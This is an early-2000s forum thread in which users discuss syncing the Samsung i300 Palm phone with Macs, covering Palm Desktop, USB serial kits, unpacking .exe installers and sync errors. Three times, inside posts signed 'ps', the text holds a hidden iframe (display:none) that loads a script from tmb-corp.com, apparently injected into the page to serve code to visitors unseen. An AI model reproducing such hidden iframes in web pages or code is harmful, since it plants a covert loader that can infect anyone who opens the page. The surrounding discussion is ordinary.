+ Reply to Thread

Thread: i300 and Macs

Question i300 and Macs

Would it be possible to sync the i300 with a Mac?

I want to add programs, but the software doesn't seem to support Mac, although Palm Desktop is readily available for Mac. Isn't the Samsung using a Palm Serial connection? I have that on Palm Desktop for Mac. Any thoughts?

Lastly, if syncing with Mac is not possible, could I transfer programs and data from my Handspring PDA (which does work with my Mac) to the i300 using infrared? If so, how would I do this?

Thanks!
    ps<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

works great with a mac.... you can use palm desktop...

if you have a newer mac without serial ports just pick up the palmconnect usb kit from palm, $29.99

everything sync's fine...

Brooks

Thanks for the reply, Brooks.

I will go to Office Depot today and pick one up.

By the way--and pardon my ignorance, since I've just received this phone--what is that funky screen with the car for? Can it be changed? I'm not sure I like it... lol.

ps

yea, that screen only comes up if you have the phone turned off.... kind of like a screen saver...

Brooks

I use the i300 primarily with my G4 mac. I have a scsi card with a serial port. I used a PC DB9 to Mac Mini serial adapter that I picked up for a couple of bucks. I had to run the exe's on the CD on a PC emulator to get a couple of prc's off of the disc. The palm desktop is a little more limited than the PC version but seemes to be working fine.

Question Blazer install from Mac?

How can I install the Blazer browser from my Mac? I sync with the usb/serial converter but the program is in some other format...Do I have to sync from a PC for this?

the file that is downloaded is an .exe file... the only reason it's an .exe file is so it will self-extract... sprint should really change this to .zip, or offer a .zip file to download...

you need someone with a PC to extract the files for you....

Brooks

Hotsync via IR on Mac?

Anyone know if the very first sync can be done via IR?
    Having not run the Palm Desktop before, is there anything i should know about synching with Entourage?
    Best Regards,

DC2light

Does anyone know how to address the Palm Desktop 2.6.1 and 2.6.3 issue in which the program cannot create a user name for the desktop?

Specifically, everything under the Hotsync menu of Palm Desktop returns "File Not Found" when clicked. In addition, the username is "None."

When I try to create a new user, it says "File Not Found."

Installing, reinstalling, and uninstalling no less than 15 times in the past two days hasn't solved the problem.

I called Palm support and stumped two technicians; neither was able to solve the problem.

Lastly, I am not the only one with this problem. In the Macintosh forums on palmblvd.com, there are about 5 more persons with the exact same problem. This thread says it all: http://www.palmblvd.com/boards/Sony-...sages/574.html

If you know of a fix or have a suggestion, it would be greatly appreciated.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Last edited by ibnabouna; 11-04-2001 at 06:25 PM.

Re: Blazer install from Mac?

Originally posted by whodean
    How can I install the Blazer browser from my Mac? I sync with the usb/serial converter but the program is in some other format...Do I have to sync from a PC for this?
    I was able to get stuffit deluxe 6.0 magic menu to uncompress the files. I just selected the file and went into the stuffit pull down and told it to expand the exe file.

I installed the 2.63 Sync program from palm on my Mac after buying the USB convertor for my G4. It wouldn't sync sometimes (VERY frustrating!). Never seemed sync my grafitti shortcuts or phone voice dials or shortcuts.

I've got it on an old 120 MHz Windows box and it runs like a charm! And with TrueSynce I can sync it to my My.Yahoo! and if it crashes I can get my calendar and address book via the wireless web!

Gary

Blazer error msg (help?)

Now when I start the browse web it initiates and dials and then I get the error msg "Error: authentication failure (0x1233)" Any know whats up? Where can I get support?

Hi all;
    Why should spending $500 for a phone require all this research just to get basic info? Called the people at sprint to see if the I300 would work (hotsynch) with my Mac. After waiting five minutes and several supervisors I was told no, it wouldn't. You guys seem to be doing okay. What gives?????
    It's also troublesome that the OS is not upgradeable. If it's a Palm OS, why not? The idea is very cool, an all in one package but it seems that a better screen (already out there), better battery life (already out there) and a flash ROM (already out there) doesn't seem like a lot to ask for $500

Stephan

Originally posted by luria
    Hi all;
    Why should spending $500 for a phone require all this research just to get basic info? Called the people at sprint to see if the I300 would work (hotsynch) with my Mac. After waiting five minutes and several supervisors I was told no, it wouldn't. You guys seem to be doing okay. What gives?????
    It's also troublesome that the OS is not upgradeable. If it's a Palm OS, why not? The idea is very cool, an all in one package but it seems that a better screen (already out there), better battery life (already out there) and a flash ROM (already out there) doesn't seem like a lot to ask for $500

Stephan
    Well, most PDA manufacturers aren't exactly enthusiastic about providing support for Apple users, which constitute 5% of the computer market in the world today. Perhaps they're bitter that Apple pioneered the PDA with the Newton, which is still much better than anything Palm and PocketPC have churned out in my opinion. The only issue about the Newton is its size. If it was as big as a Palm V, for example, it would be the perfect PDA. Unfortunately, Apple was too revolutionary when it made the Newton; there was no market for such an advanced device at the time. A year later, Palm swooped in and that all she wrote.

With regard to your gripes, I wouldn't mind a better screen (hopefully coming in the next revision) and a USB interface. However, I don't see a problem with battery life at all. Maybe everyone here uses his/her phone much more than I use mine, but I certainly don't think my battery is too weak. Additionally, Samsung gives you two batteries, which should be sufficient.

Lastly, the only thing you need to know about the i300/Mac interface is that the i300 is essentially like a Palm IIIx. Treat it like one and it will work. That means you should go ahead and buy a Palm Connect USB kit (29.99 at Best Buy) and sync using the CD that comes with kit.

Good luck,
    ps